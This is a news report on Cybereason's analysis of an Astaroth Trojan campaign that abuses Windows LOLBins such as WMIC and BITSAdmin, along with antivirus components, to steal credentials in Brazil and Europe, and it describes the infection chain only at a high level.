A new Astaroth Trojan campaign targeting individuals in Brazil and European countries is exploiting Avast antivirus and security software developed by GAS Tecnologia to steal online credentials and personal information, according to new research from cybersecurity research firm Cybereason.
Cybereason’s Nocturnus Research team said that the malware uses “legitimate, built-in Windows OS processes to perform malicious activities and deliver a payload without being detected” and makes use of “well-known tools and even antivirus software to expand its capabilities.”
The Astaroth Trojan was previously detected by security researchers at Cofense in October of last year. The Trojan specifically targeted individuals in South America during 2017 and is known for taking advantage of Living Off the Land binaries (LOLBins).
The new Astaroth Trojan discovered by Cybereasons’s researcher uses tools like the “BITSAdmin utility and the WMIC utility to interact with a C2 server and download a payload.”
Just like previous spam campaigns, the new Trojan variant begins with a .7zip file that targets individuals in the form of an e-mail message attachment or a hyperlink.
“The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware. Upon initialization, a process spawns that uses the legitimate wmic.exe to initialize an XSL Script Processing attack,” Cybereason said.
The malware then connects to a command-and-control (C2) server and sends information about the infected computer to the remote server. After downloading the encrypted XSL scripted to the infected machine, the Trojan will use BITSAdmin to download the attackers’ payload to the target from a separate C2 server.
“Masqueraded as JPEGs, GIFs”
The cybersecurity researchers said the payload files are “masqueraded as JPEGs, GIFs, and extensionless files, and contain the Astaroth modules”.
In addition, the malicious Trojan made use of unins000.exe to gather and collect personal user information without being detected if Avast is not present on the infected machine.
“Once the campaign has successfully infiltrated, it will log the user’s keystrokes, intercept their operating system calls, and gather any information saved to the clipboard continuously. With these methods, it uncovers significant amounts of personal information from the user bank accounts and business accounts,” Cybereason researchers said.
“Additionally, in conjunction with NetPass, it gathers user login passwords across the board, undetected, including any of their remote computers on LAN, mail account passwords, Messenger accounts, Internet Explorer passwords, and others.”
Cybereason concluded in their analysis that the tools used in the Astaroth campaign shows just how effective these techniques are at evading antivirus products.
“As we enter 2019, we anticipate that the using of WMIC and other Living Off The Land binaries (LOLbins) will increase,” Cybereason said. “Because of the great potential for malicious exploitation inherent in the use of LOLbins, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines.”